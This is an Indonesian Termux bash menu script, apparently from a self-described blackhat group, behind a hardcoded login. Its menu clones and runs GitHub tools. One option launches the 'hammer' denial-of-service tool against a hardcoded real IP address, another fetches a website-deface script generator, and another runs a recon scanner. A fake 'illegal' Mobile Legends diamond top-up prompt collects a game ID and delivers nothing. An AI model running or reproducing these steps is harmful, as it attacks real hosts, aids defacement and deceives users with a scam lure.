recodwhite='\033[37;1m'
blue='\033[34;1m'
green='\033[32;1m'
purple='\033[35;1m'
cyan='\033[36;1m'
white='\033[37;1m'
yellow='\033[33;1m'
red='\033[1;31m'
clear
clear
cowsay -f eyes "ASSALAMUALAIKUM" | lolcat
echo  $purple"╔════╗╔══════════════════════╗"
read -p      "║ ON ║║Username :"  pass
echo  $purple"╚════╝╚══════════════════════╝"
if [ $pass = "SOLO" ]
then
clear
toilet -f slant --gay "Login Success"
sleep 1
clear
else
  echo "\033[31;((+_+)"
  echo "\033[37;1m"
  sleep 300
  sh 991.sh
fi
cowsay -f eyes "ASSALAMUALAIKUM" | lolcat
echo  $purple"╔════╗╔══════════════════════╗"
read -p      "║ 0N ║║Password : " pass
echo  $purple"╚════╝╚══════════════════════╝"
read -p
if [ $pass = "PLAYER" ]
then
clear
toilet -f slant --gay "Login Success"
sleep 1
clear
else
  echo "\033[31;((+_+)"
  echo "\033[37;1m"
  sleep 300
  sh 991.sh
fi
echo $cyan"◣∵∵◢◣∵▇▇∵◢◣∵∵◢"
echo $cyan"▇∵◢▇▇▇◣◢▇▇▇◣∵▇"
echo $cyan"▇▇▇▇▇▇▇▇▇▇▇▇▇▇"
echo $cyan"▇╳◥▇▇▇▇▇▇▇▇◤╳▇"
echo $cyan"▇╳╳◥▇▇▇▇▇▇◤╳╳▇"
echo $cyan"▇╳╳╳◥▇▇▇▇◤╳╳╳▇"  "SIAPA NAMA KK? YANG PENTING JANGAN NAMA MANTAn : V"
echo $cyan"▇◣╳╳╳▇▇▇▇╳╳╳◢▇"
echo $cyan"◥▇▇▇▇▇▇▇▇▇▇▇▇◤"
echo $cyan"∵◥▇▇▇▇◢◣▇▇▇▇◤∵"
echo $cyan"∵∵◣▇▇▇▇▇▇▇▇◢∵∵"
echo " ============================="
read nick #membaca yang ditulis
echo " ============================="
echo
echo $green
echo "LOADING..........................................................."
sleep 0.5;
echo $white
echo "LAGI BERAK MOHON DITUNGGU SEBENTAR............................................................"
sleep 0.8;
clear
figlet -f smslant "MR..LUKMAN" | lolcat
echo "------------------------------------------------------------------" | lolcat
echo $red
echo "WARNING!!$green kami tdk bertanggung jawab atas tindakan melahirkan anak orang : v"
echo
echo $white"  ╔═════════════════════════ ▓▓ ࿇ ▓▓ ═════════════════════════╗ "
echo
echo $cyan"                    CREATED BY : $yellow AMENA GANS"
echo $cyan"             SPESIAL THANKS TO : $yellow Micin | MR.P1K4CHU |
                MH.TAHU | XXX | MR.ANAK SETAN |
                      Jr.Fake404 | Legend |"
echo $cyan"             Dan seluruh member ICM & PASURUAN BLACKHAT"
echo $white"  ╚═════════════════════════ ▓▓ ࿇ ▓▓ ═════════════════════════╝"
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 01 ) TOOLS DIAMOND MOBILE LEGEGND"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 02 ) MEMBUAT SECRIPT DEFACE"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 03 ) MEMBUAT MEMPERCANTIK TERMUX"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 04 ) TOMBOL SEPESIAL TERMUX"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 05 ) SURAH-Al-quran"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 06 ) DDOS HAMER"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 07 ) RED_HAWK"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple"═══════════════════════════════════════════"
echo  $yellow"( 0 ) YAKIN MAU KELUAR : V"
echo  $purple"═══════════════════════════════════════════"
echo""
echo  $purple""
read -p "[Mr.LUKMAN]> " bro;
if [ $bro = 01 ] || [ $bro = 01 ]
then
clear
echo $purple"==============================================="
echo  $red" TOP UP ILEGAL ML "
sleep 1
echo  $white " selamat Datang Di Tools Lukman "
echo  $red" ID ML nya yang Benar biar bisa masuk "
echo $purple"==============================================="
echo $purple"MAU ISI DM BERAPA?="read #tulisan keluar
read nick #membaca yang ditulis
echo $purple"==============================================="
echo $merah"TUNGGU DIAMOND MASIH SAYA PROSES.HARAP BERSABAR°°°°°°°°°°°°°°°°° "
echo $purple"==============================================="
read nick #membaca yang ditulis
echo $purple"==============================================="
fi
if [ $bro = 02 ] || [ $bro = 02 ]
then
clear
echo  $red" MEMBUAT SECRIPT DEVACE "
sleep 1
pkg install python2
 pkg install git
git clone https://github.com/4L13199/LITESCRIPT
cd LITESCRIPT
python2 LITESCRIPT.py
fi

if [ $bro = 03 ] || [ $bro = 03 ]
then
clear
echo  $red" MEMBUAT MEMPERCANTIK TERMUX "
sleep 1
pkg install ruby
 pkg install nano
 pkg install cowsay
 pkg install figlet
 pkg install toilet
 gem install lolcat
nano /data/data/com.termux/files/usr/etc/profile
fi

if [ $bro = 04 ] || [ $bro = 04 ]
then
clear
echo  $red" TOMBOL SEPESIAL TERMUX "
sleep 1
pkg install bash
pkg install python2
pkg install git
git clone https://github.com/Rusmana-ID/tombol-special-termux
cd tombol-special-termux
python2 special.py
fi

if [ $bro = 05 ] || [ $bro = 05 ]
then
clear
echo  $red" SURAH-Al-quran "
sleep 1
pkg install update && pkg install upgrade
pkg install git
git clone https://github.com/Rusmana-ID/surah-al-quran
cd surah-al-quran
sh surah.sh
fi

if [ $bro = 06 ] || [ $bro = 06 ]
then
clear
echo  $red" DOOS HAMER "
termux
pkg update
pkg upgrade
pkg install python
pkg install git
git clone https://github.com/cyweb/hammer
cd hammer
python hammer.py -s 161.117.70.145
fi

if [ $bro = 07 ] || [ $bro = 07 ]
then
clear
pkg install update && pkg install upgrade
pkg install git
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
php rhawk.php
fi

if [ $bro = 0 ] || [ $bro = 00 ]
then
echo "\033[32;1mDARKNESS CYBER TEAM"
sleep 1
echo "\033[33;1mWe Security"
sleep 1
echo " We Not Friends"
sleep 1
echo "We Are Family"
sleep 1
echo "Hacking Is Not Criminal;)"
sleep 1
echo "Ketika Sebuah Hayalan Tidak tercapai"
sleep 1
echo "Maka Terus lah BerJuang Dan Berusaha:)"
sleep 1
echo "\033[32;1mKarna Suatu Hari Nanti Kamu akan Mendapatkannya:)"
sleep 1
fi
